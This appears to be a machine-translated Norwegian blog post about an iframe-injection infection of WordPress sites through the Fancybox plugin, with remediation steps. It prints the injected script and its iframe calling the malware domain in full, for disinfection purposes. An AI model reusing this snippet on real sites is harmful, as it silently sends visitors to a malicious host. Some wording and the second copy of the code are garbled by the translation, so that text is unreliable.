I begynnelsen av uken en serie nettsteder og blogger med WordPress, mottok advarsler om Malware -infeksjon gjennom Google WebMastere.
Problemet som Google WebMastere refererer til er tilstedeværelsen av en torsk / manus iframe malware i kilden til websidene.
<script>if (navigator.userAgent.match(/msie/i)) { document.write(' <div style="position:absolute;left:-2000px;width:2000px"><iframe src="http://203koko.eu/hjnfh/ipframe2.php" width="20" height="30" ></iframe></div>'); }</script>Det ser ut til å være en sårbarhet en pluginfrikjenneFancybox for WordPress som frem til i går (05.02.2015) ikke hadde blitt oppdatert på lang tid.
Å løse dette problemet og desinfiserer virusseter Med denne malware er det relativt enkelt.
1. Deaktiver plugn fancybox.
2. Slett alle Fancybox -plugin -filer på serveren (via FTP)
3. Installer den nye versjonen av plugin (Fancybox 3.0.4)
Fancybox for WordPress 3.0.4
– Omdøpt innstillingen som er berørt av sikkerhetsspørsmålet som er nevnt i 3.0.3. Dette bør hindre den ondsinnede koden fra å vises på nettsteder der pluginen oppdateres uten å fjerne den ondsinnede koden.
Fancybox for WordPress 3.0.3
– Rettet et sikkerhetsproblem.
Malware Info:
Type: IFrame -omdirigering
Mål: WordPress Fancybox
Malware -domene: 203Koko.eu
Malware Uri: http://203koko.eu/hjnfh/ipframe2.php
Malware Raw Code: <iframe src =”http://203koko.eu/hjnfh/ipframe2.php” bredde =”20″ høyde =”30″ ></iframe>
Malware -skript: <manus>if (navigator.useragent.match (/msie/i)) {document.write (‘ <div stil =”Posisjon: Absolutt; Venstre: -2000px; Bredde: 2000px”>
Fjern skadelig programvare fra WordPress -nettstedet ditt.
